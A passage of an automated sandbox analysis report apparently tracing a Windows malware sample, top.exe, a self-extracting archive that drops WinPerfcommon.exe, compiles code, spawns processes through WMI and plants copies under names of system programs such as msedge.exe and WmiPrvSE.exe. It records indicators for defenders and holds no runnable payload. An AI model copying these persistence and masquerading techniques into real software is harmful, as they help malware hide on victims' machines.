                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: mscoree.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: version.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: uxtheme.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: windows.storage.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wldp.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: profapi.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptsp.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: rsaenh.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptbase.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: sspicli.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: mscoree.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: version.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: uxtheme.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: windows.storage.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: wldp.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: profapi.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptsp.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: rsaenh.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: cryptbase.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Users\user\Desktop\top.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDirectory created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeDirectory created: C:\Program Files\MSBuild\Microsoft\9e60a5f7a3bd80Jump to behavior
                                    Source: top.exeStatic file information: File size 2342756 > 1048576
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: top.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: top.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: top.exe
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\imeik232\imeik232.pdb source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.pdb source: WinPerfcommon.exe, 00000006.00000002.2427021597.000000000343E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: top.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: top.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: top.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: top.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: top.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\04s13a00\04s13a00.cmdline"Jump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imeik232\imeik232.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\top.exeFile created: C:\msproviderBrokerMonitornet\__tmp_rar_sfx_access_check_4835625Jump to behavior
                                    Source: top.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046F640 push ecx; ret 0_2_0046F653
                                    Source: C:\Users\user\Desktop\top.exeCode function: 0_2_0046EB78 push eax; ret 0_2_0046EB96
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeCode function: 6_2_00007FF848F40C0D push ebx; retf 6_2_00007FF848F40C1A
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeCode function: 6_2_00007FF849355601 pushad ; retf 6_2_00007FF8493559CD
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeCode function: 6_2_00007FF8493559BC pushad ; retf 6_2_00007FF8493559CD
                                    Source: WinPerfcommon.exe.0.drStatic PE information: section name: .text entropy: 7.574103435922908
                                    Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe.6.drStatic PE information: section name: .text entropy: 7.574103435922908
                                    Source: SystemSettings.exe.6.drStatic PE information: section name: .text entropy: 7.574103435922908
                                    Source: wnSgpBKJabSHvDawwFjyhiOtGEGVta.exe0.6.drStatic PE information: section name: .text entropy: 7.574103435922908
                                    Source: WmiPrvSE.exe.6.drStatic PE information: section name: .text entropy: 7.574103435922908
                                    Source: OfficeClickToRun.exe.6.drStatic PE information: section name: .text entropy: 7.574103435922908

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Program Files (x86)\Windows Portable Devices\OfficeClickToRun.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\qMBWbOkw.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\GOHavRZK.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\ZndYtGLf.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\Qxaqfufs.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\kTYwyifI.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\alFgOGaa.logJump to dropped file
                                    Source: C:\Users\user\Desktop\top.exeFile created: C:\msproviderBrokerMonitornet\WinPerfcommon.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\SHwrfMKt.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Program Files\MSBuild\Microsoft\SystemSettings.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\ProgramData\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJump to dropped file
